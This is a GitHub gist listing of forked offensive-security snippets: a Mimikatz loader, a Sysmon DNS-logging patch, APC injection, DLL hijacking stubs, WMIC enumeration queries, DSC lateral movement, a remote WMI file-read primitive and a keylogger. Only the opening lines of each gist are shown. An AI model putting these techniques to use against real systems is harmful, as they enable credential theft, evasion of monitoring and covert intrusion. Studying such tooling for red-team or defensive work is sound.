v4nyl
/ Tasks.cs
Created
May 29, 2020 14:59
— forked from Ridter/Tasks.cs
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
v4nyl
/ getloggedon.py
Created
June 3, 2020 08:05
— forked from dirkjanm/getloggedon.py
Simple script that uses impacket to enumerate logged on users as admin using NetrWkstaUserEnum and impacket
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Copyright (c) 2012-2018 CORE Security Technologies | |
| # | |
| # This software is provided under under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. | |
| # | |
| # Gets logged on users via NetrWkstaUserEnum (requires admin on targets). | |
| # Mostly adapted from netview.py and lookupsid.py | |
| # |
v4nyl
/ dns_sysmon_patch.c
Created
June 3, 2020 08:07
— forked from xpn/dns_sysmon_patch.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| #include <Windows.h> | |
| #include <WinDNS.h> | |
| // Pattern for hunting dnsapi!McTemplateU0zqxqz | |
| #define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c" | |
| #define PATTERN_LEN 14 | |
| // Search for pattern in memory | |
| DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) { |
v4nyl
/ gadget2jscriptQueueAPCInject.cs
Created
June 4, 2020 09:24
— forked from rvrsh3ll/gadget2jscriptQueueAPCInject.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| using System.Net; | |
| using System.IO.Compression; | |
| public class Payload | |
| { |
v4nyl
/ main.cpp
Created
June 5, 2020 08:06
— forked from monoxgas/main.cpp
Adaptive DLL Hijacking - Patching LoadLibrary Return
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <intrin.h> | |
| #include <string> | |
| #include <TlHelp32.h> | |
| #include <psapi.h> | |
| BOOL PatchTheRet(HMODULE realModule) { | |
| // Get primary module info |
v4nyl
/ main.cpp
Created
June 5, 2020 09:47
— forked from monoxgas/main.cpp
Adapative DLL Hijacking - Stability Hooking
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <intrin.h> | |
| #include <string> | |
| #include <TlHelp32.h> | |
| #include <psapi.h> | |
| DWORD WINAPI Thread(LPVOID lpParam) { | |
| // Insert evil stuff | |
| ExitProcess(0); |
v4nyl
/ wmic_cmds.txt
Created
June 9, 2020 12:36
— forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Host Enumeration: | |
| --- OS Specifics --- | |
| wmic os LIST Full (* To obtain the OS Name, use the "caption" property) | |
| wmic computersystem LIST full | |
| --- Anti-Virus --- | |
| wmic /namespace:\\root\securitycenter2 path antivirusproduct |
v4nyl
/ PowerShellDSCLateralMovement.ps1
Created
June 9, 2020 12:37
— forked from mattifestation/PowerShellDSCLateralMovement.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This idea originated from this blog post on Invoke DSC Resources directly: | |
| # https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/ | |
| <# | |
| $MOFContents = @' | |
| instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref | |
| { | |
| ResourceID = "[Script]ScriptExample"; | |
| GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; | |
| TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; |
v4nyl
/ FileReadPrimitive.ps1
Created
June 9, 2020 12:37
— forked from mattifestation/FileReadPrimitive.ps1
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $CimSession = New-CimSession -ComputerName 10.0.0.2 | |
| $FilePath = 'C:\Windows\System32\notepad.exe' | |
| # PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation. | |
| $PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession | |
| $InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly | |
| $FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession | |
| $FileLengthBytes = $FileContents.FileData[0..3] | |
| [Array]::Reverse($FileLengthBytes) |
v4nyl
/ keylogger.py
Created
June 9, 2020 12:38
— forked from xorrior/keylogger.py
Python on disk keylogger
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import zipfile | |
| import io | |
| import sys | |
| import os, imp | |
| import base64 | |
| import threading | |
| moduleRepo = {} | |
| _meta_cache = {} |